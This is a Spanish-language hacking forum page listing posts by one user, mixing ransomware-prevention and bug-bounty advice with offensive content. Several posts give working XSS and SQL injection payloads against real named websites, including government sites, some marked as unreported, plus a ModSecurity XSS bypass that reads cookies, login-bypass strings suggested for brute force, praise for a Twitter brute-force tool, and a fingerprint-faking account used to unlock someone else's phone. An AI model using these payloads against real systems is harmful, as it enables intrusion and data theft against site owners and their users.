Mostrar Mensajes

Esta sección te permite ver todos los posts escritos por este usuario. Ten en cuenta que sólo puedes ver los posts escritos en zonas a las que tienes acceso en este momento.

Mensajes - Drok3r

Páginas: [1] 2 3
1
Debates y Reviews / Re:Introducción al BugBounty / BugHunter
« en: Agosto 22, 2019, 11:27:38 pm »
Interesante duda, la tuya, podria decirse que es muy facil de responder.

1.- Identifica tu nivel de habilidades con las cuales puedas realizar la caza de bugs, en este punto debes de dejar de ser alguien que "apenas esta aprendiendo" sino mínimo tener de 3 a 5 años de experiencia. Esta experiencia debe cubrir: Creación de reportes, saber mínimo un 50% de ingles, conocimientos medios/avanzados de programación, de seguridad y explotación de vulnerabilidades. HackerOne es muy competitivo, debes tener en cuenta que hay personas que a eso se dedican 24/7.

2.- Debes de leer muy bien, cuales son las "reglas" de las empresas a la hora de buscar fallos, esto debido a que no aceptan todas las vulnerabilidades, algunas por ejemplo, solo aceptan vulnerabilidades XSS o SQL INJECTION. Aparte de conocer, bien la vulnerabilidades y sus trucos para explotarla, debes tener en cuenta que puede que mantengas un contacto con el equipo técnico de la empresa, hasta lograr solucionar la vulnerabilidad, no solo es reportar.

3.- Tienes que ser rápido, al igual que tu hay cientos de personas, tanto por parte de HackerOne como por fuera intentado explotar el mismo fallo, solo los mas rápidos y talentosos lo lograran.

4.- En cuanto al momento de buscar los bugs, debes de tener claro una metodología que te sea de utilidad, por ejemplo, comiza por la parte de reconocimiento, recopilaron de información, etc. En cuanto a pruebas de penetración en aplicaciones web, yo recomiendo seguir la de OWASP, ya con el tiempo y la experiencia puede que tu hagas la tuya. En dado caso que el programa solo de pagos por X tipo de vulnerabilidad, pues ni como ayudarte más. Deberás tener las nociones de donde poder encontrar ese fallo, por ejemplo un XSS se puede encontrar en la sección de "Buscar", comenzar por ahí, de esta forma sucesiva.

5.- Si estas comenzado, te recomiendo busques otros programas más tranquilos, como OpenBugBounty.

2
Manuales y libros / How to Fake Fingerprints | PDF
« en: Agosto 22, 2019, 06:31:06 pm »

Ya un tanto viejo el PDF pero su contenido aun es de gran utilidad. He logrado obtener las huellas de mi hermano y desbloquear su SmartPhone el cual contiene un sistema de desbloqueo en base a la huella dactilar.



Fuente: r3dbird.blogspot.mx

3
Seguridad / RANSOMWARE | 13 tips para evitar ser infectado
« en: Agosto 22, 2019, 06:05:34 pm »

De acuerdo a las cifras ofrecidas por KasperskyLab, el aumento de nuevas amenazas de ransomware se ha intensificado casi al doble.

7,620 - 2018 - Amenazas de Ransomware
16,017 - 2019 Amenazas de Ransomware

Al igual, que los números de usuarios infectados (victimas) del ransomware.

158.921 usuarios afectados 2018
230.000 usuarios afectados 2019

Lo cual siguiere que para el próximo año 2020, el numero de amenazas aumentara, esto incluye nuevas técnicas de infección y métodos de distribución. Sin embargo, muchos de estos casos de infección de ransomware a día de hoy, pudieron haber sido evitados, si se siguiera una serie de medidas de seguridad, algunas mas viejas que la misma amenaza.



13 tips para evitar la infección de Ransomware

1.- Realizar periódicamente Backups de tu información. Se recomienda tener copias de nuestra información en medios como la nube, otro en físico, como memorias USB y discos duros portátiles.

2.- Mantener el Sistema Operativo actualizado hasta la ultima versión.

3.- Contar con software antivirus que tenga funciones anti-ransomware

4.- Aumentar la seguridad de tus dispositivos moviles como SmartPhones y Tablet. En 2017 Google elimino mas de 700,000 aplicaciones maliciosas de la PlayStore.

5.- De ser posible implementar extensiones anti-malware a los navegadores.

6.- Mantener actualizado los antivirus.

7.- Establecer filtros de seguridad en los e-mail, corporativos o no.

8.- No descargar archivos de ningún tipo de fuentes poco confiables o no oficiales.

9.- Contar con un repertorio de herramientas anti-ransomware. Esto debido a que existen herramientas especificas para un tipo de ransomware.

10.- Prepara un plan de respuesta y de ser necesario capacita a tus empleados o usuarios de la red, como a tu familia.

11.- Ejecuta análisis periódicos en busca de amenazas en tus equipos

12.- No pagar el rescate. En muchos casos, usuarios han pagado el rescate y no recuperaron ni su información ni sus equipos.

13.- Usar el sentido común y no dar clic en todo lo que veamos.

En caso de ser infectado by VPNMentor

1.- Minimiza el Daño
En primer lugar tienes que aislar el sistema que se ha visto afectado, especialmente si está conectado a la red, para evitar que se infecten otros sistemas. Si eres un administrador de la red y tus servidores están infectados, desconecta todos los cables de Ethernet.

2.- Identificar el Ransomware
Existen varios tipos de ransomware, algunos más peligrosos y difíciles de resolver que otros. Puedes utilizar diferentes estrategias para deshacerte de ellos dependiendo del tipo y características del ataque. Los tipos más
comunes entran en una de las siguientes categorías:

  • Scareware o falsos antivirus
  • Ransomware de bloqueo de pantalla
  • Ransomware que cifra archivos


3.- Decidir que estrategia tomar
Hemos mostrado antes los métodos para eliminar los dos primeros tipos de ransomware con relativa facilidad.

Los programas que cifran archivos son más difíciles de eliminar. En primer lugar tendrás que identificar el tipo de malware en cuestión. La información de los programas más recientes puede ser escasa, ya que cada día se escribe malware nuevo, pero en la mayoría de los casos deberías poder identificarlo investigando un poco.

Intenta sacar capturas de pantalla de la nota de rescate y luego busca las imágenes mediante una búsqueda inversa para identificar el tipo exacto de ransomware. También puedes buscar las frases que aparecen en el texto del mensaje.

Decide si quieres pagar el rescate o no. Aunque no se recomienda pagar a los atacantes ya que ello fomenta que continúen su actividad, a veces tu información es demasiado importante como para perderla. Usa tu juicio y no pagues a menos que sea absolutamente necesario. En el peor de los casos tienes que tener en cuenta que no existe garantía de que te devolverán los datos aunque pagues.

4.- Momento de realizar la estrategia
Si puedes identificar detalles del ransomware que infectó tu equipo, busca en Internet formas de eliminarlo. El código del malware siempre es ineficiente. El desarrollador puede haberse olvidado de borrar la clave de cifrado del programa que la recupera y descifra los archivos.

Si el ransomware es bastante conocido y tiene lagunas, deberías poder encontrar tutoriales y guías sobre cómo eliminarlo en webs como nomoreransom.org.

Debido a que muchos programas ransomware simplemente eliminan los archivos originales tras cifrar las copias del atacante, puede ser posible recuperarlos utilizando software de recuperación de datos. Cuando borras un archivo, este no se borra físicamente del disco a menos que sea sobrescrito por otro. Por consiguiente, debería ser posible recuperar los datos importantes utilizando software gratuito de recuperación de datos.

Si ninguno de estos programas tiene éxito, hay que tomar una decisión: paga el rescate o pierde tus datos. Por supuesto, aunque pagues, no está garantizado que los recuperes. Se trata de una cuestión de juicio ya que depende de la buena fe de los atacantes. También puedes intentar negociar con los atacantes utilizando la dirección email que se muestra en la nota de rescate. Es sorprendente la frecuencia con la que suele funcionar.

Si decides no pagar el rescate, el siguiente paso es limpiar tu PC, pero perderás tus datos para siempre. Si tienes un backup en un disco externo, NO lo conectes a tu PC antes de formatearlo por completo.

La mejor manera de eliminar ransomware es formatear tu sistema operativo. Si no quieres hacer algo tan drástico, asegúrate de que el ransomware no infecta el sector de arranque; puedes encontrar información al respecto en Internet. A continuación, actualiza tu antivirus y analiza tu sistema en profundidad. También es buena idea complementar el antivirus con un programa anti malware para tener protección completa, lo cual debería eliminar el ransomware por completo.

5.- Identificar como ocurrió la infección
Ahora que ya te has deshecho de tu ransomware es el momento de averiguar por qué te atacaron. Como dijo un hombre sabio una vez: «más vale prevenir que curar» – y eso es más importante en cuanto a la seguridad en Internet que a cualquier otra cosa. Una defensa sólo puede ser tan fuerte como lo es el usuario, y con la debida protección implementada es difícil para cualquier malware poder atacarte.

4
Hacking ShowOff / [SQL INJECTION] www.consolemarcello.gov.it
« en: Febrero 12, 2019, 06:17:31 am »
  • Sitio: consolemarcello.gov.it (gobierno de Italia)
  • Vulnerabilidad: SQL INJECTION
  • Reportado: SI
  • URL:

5
Underc0de / Re:Underc0de Podcasts
« en: Septiembre 29, 2018, 02:26:03 am »
Muy buena serie... los felicito

6
Underc0de / Re:Bases para ser Staff
« en: Septiembre 27, 2018, 02:04:06 am »
Estaria bueno ser STAFF de UnderC0de por un tiempo... lastima que no cumplo los requisitos de "actividad"... u.u ni modo jeje

7
Bugs y Exploits / Re:Strings de SQL para lograr hacer ByPass a un login web
« en: Septiembre 27, 2018, 02:01:18 am »
estaria bien tener un script , ir colocandolo uno por uno es cansoso

Lo puedes hacer mediante un ataque de BruteForce, y estos Strings los tomas a modo de diccionarios de pass y users

8
Dudas y pedidos generales / Re:vulnerabilidad
« en: Septiembre 23, 2018, 10:57:24 pm »
Tendrías que lanzar nmap y ver que puerto es, que servicio corre y la versión del mismo , a partir de ahí puedes lanzar directamente metasploit y usar el comando search poniendo como parámetro el servicio
, O dos que es la que te recomiendo , Googlear el servicio junto con su versión y verificar si existe una vulnerabilidad y un exploit , buscar el cve con el que está registrada , si el exploit ya está integrado en metasploit o lo tendrás que integrar manualmente
, Y pues después lanzar el exploit indicando en los parámetros el puerto a atacar .
Espero me hayas entendido 😅
Saludos 😊

Mejor dicho de ninguna forma...

9
Bugs y Exploits / ByPass XSS ModSecurity
« en: Septiembre 23, 2018, 04:10:30 am »
ByPass XSS ModSecurity
[/b]

Como todos sabemos y conocemos muy bien ModSecurity es un WAF, un FireWall de apliaciones web, que ejecuta el módulo del servidor web Apache. Dentro de sus funciones es proteger contra diversos ataques, monitorizar el trafico HTTP y tambien hacer analisis en tiempo real.

ModSecurity ha evitado que lograra explotar la vulnerabilidad XSS (Cross Site Scripting) en algunas apliaciones web, que he testeado, hasta que un dia logre "Bypasear" o burlar el filtro XSS de ModSecuirty.

Utilizando estos dos payloads de XSS logre burlar el filtro y ejecutar mi codigo JS para explotar el XSS

Código: [Seleccionar]
---[ByPass Mod_Security]---
'><img src=x onError=prompt("Drok3r")>
'><img+sRc=l+oNerrOr=prompt(document.cookie)+x>

Con las pocas pruebas que hice, tengo como resultado (en mi mala logica) que ModSecurity filtra <script></script> y alert (No importa como intentes camuflajear las etiquetas <script> o alert el ModSecuirty las detecta)

PoC:

10
Pentesting / Re:upload.php [Vulnerabilidad]
« en: Septiembre 23, 2018, 03:53:36 am »
Jajaj lo siento por la confucion, entonces tengo un mal entendido y no recuerdo, pero segun yo tambien se le llamaba asi al poder subir en un upload una shell o ando marihuano como dice @arthusu jaja confuciones de terminos

No estas tan perdido, pues con RFI puedes cargar Shells... sin embargo son cosas distintas RFI y AFU (Arbitrary File Upload - Carga Arbitraria de Archivos)

11
Bugs y Exploits / Strings de SQL para lograr hacer ByPass a un login web
« en: Septiembre 23, 2018, 03:37:51 am »
Hola a todos...!!!

Les comparto esta lista de strings de SQL para realizar pruebas, contra una apliacion web, que tenga un login, para verificar si este es vulnerable a BYPASS LOGIN.



Link: https://pastebin.com/raw/dqmwFaXt

12
Hacking / Re:Tweetshell - Revienta cuentas de Twitter con fuerza bruta
« en: Septiembre 23, 2018, 03:26:40 am »
Interesante... voy a jugar un poco :3

13


Se puede descargar cualquier archivo con formato:
{
  case "pdf": $ctype="application/pdf"; break;
  case "exe": $ctype="application/octet-stream"; break;
  case "zip": $ctype="application/zip"; break;
  case "doc": $ctype="application/msword"; break;
  case "xls": $ctype="application/vnd.ms-excel"; break;
  case "csv": $ctype="application/vnd.ms-excel"; break;
  case "ppt": $ctype="application/vnd.ms-powerpoint"; break;
  case "gif": $ctype="image/gif"; break;
  case "png": $ctype="image/png"; break;
  case "jpeg":
  case "jpg": $ctype="image/jpg"; break;
  default: $ctype="application/force-download";
}


14
¡Hola!

No indagué mucho, pero al principio parecía vulnerable a Arbitrary File Download, aunque no logro bypassear el filtro.
De todas formas, conseguí un FPD generando un error a la hora de utilizar el archivo "dl.php" provisto por ellos.
https://www.miros.gov.my/1/dl.php?filename=.
FPD: C:\xampp\htdocs\miros\1\dl.php

Saludos.

Hola...

Muy interesante... igual con un poco de tiempo de logra sacar algo

15


  • URL: https://www.miros.gov.my
  • Vector: search
  • Payload: x'"><script>alert(/Drok3r/)</script>
  • Autor: Drok3r (redbirdTEAM, CiberSecurityRECON)
  • Reportado: NO

16
Shells / Re:[PHP] Lista de backdoors inúsuales [WAF Bypass].
« en: Julio 26, 2018, 09:12:50 pm »
Muy interesante...

Me permites compartirlo en mi fan page de facebook?

NOTA: Doy credito

17
¡Hola Drok3r!

Excelente XSS, pero te comento que la web también es vulnerable a SQLi, por si no lo has notado.

Payload: http://www.dynastybuilders.ca/custom-gallery.php?id=' union select 1,version(),3,4,5,6,7,8,9,10,11 -- -

¡Saludos!


Aaaa que cosas.... jeje Gracias por el dato.

18
    Captura de pantalla


    Url del sitio


    Vector
  • Archivo y Parametro: custom-gallery.php?id=
  • Payload XSS: '"><script>alert(/Drok3r - XSS /)</script>
  • PoC:

----> http://www.dynastybuilders.ca/custom-gallery.php?id=33%27%22%3E%3Cscript%3Ealert(/Drok3r%20-%20XSS%20/)%3C/script%3E

    Autor
[!] Drok3r (redbirdTEAM - CiberSecurityRECON)

    Reportado: SI

19
Pues... es un extasis reportar algo y que mejor que ayudar a que la tecnologia sea mas segura. Pero como todo, no todo el tiempo suceden cosas "buenas" por tal motivo algunos prefieren reportar desde dos puntos, el anonimo y en bugbounty.

Anonimo: mandar un correo electronico a la cuenta de admin del sitio, utilizando un monton de tecnicas y juguetes para "mantener" el "anonimato.

BugBounty: Los caza recompenzas que estan detras de los miles de millones de programas donde te pagan por reportar vulnerabiliades.

Algo es seguro, en la mayoria de los casos... no te haran caso, no te daran ni las gracias (aunque solucionen la falla o la vulnerabilidad) y en ocaciones mas minimas te daran algo (reconocimiento, dinero, un producto, etc...)

Algo que te recomiendo es que hagas un buen reporte tecnico sobre la vulnerabilidad y seas muy especifico en el "como explotarla", en las POC.

Mis reportes:
https://www.openbugbounty.org/researchers/drok3r/
https://map.httpcs.com/author/26493

20
Hacking ShowOff / Re:[Google Hacking] Leak de Britishsexcontacts!!!
« en: Junio 09, 2018, 09:19:25 pm »
Mientras jugaba con tu dork, me di cuenta que britishsexcontacts[.]com es vulnerable a SQL INJECTION y XSS

--> SQL INJECTION
http://www.britishsexcontacts.com/Members/Reply.php?sid=47486'

[!] ERROR SQL: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' LIMIT 1' at line 1
SELECT Filename, Filename_Private FROM qdgirls WHERE ID = 47486' LIMIT 1;

-->XSS y SQL INJECTION
PoC_1

1.- En la pagina principal (http://www.britishsexcontacts.com/Members/index.php) esta un apartado para realizar busquedas (quiero creer que de usuarios)
2.- Una vez identificado esta seccion ponemos una comilla simple ' y nos notificara el error SQL, el cual puede nos permite realizar una inyeccion
3.- En este mismo apartado ingresamos el payload de javascript '"><script>alert(/X/)</script> y nos levatara el alert

:3

--> XSS
PoC
1.- ingresamos a la pagina principal (http://www.britishsexcontacts.com/Members/index.php)
2.- Ya una vez dentro de la pagina, a la URL le agregamos /'"><script>alert(/X/)</script> para que nos quede de la siguiente forma: http://www.britishsexcontacts.com/Members/index.php/'"><script>alert(/X/)</script> y listo

Páginas: [1] 2 3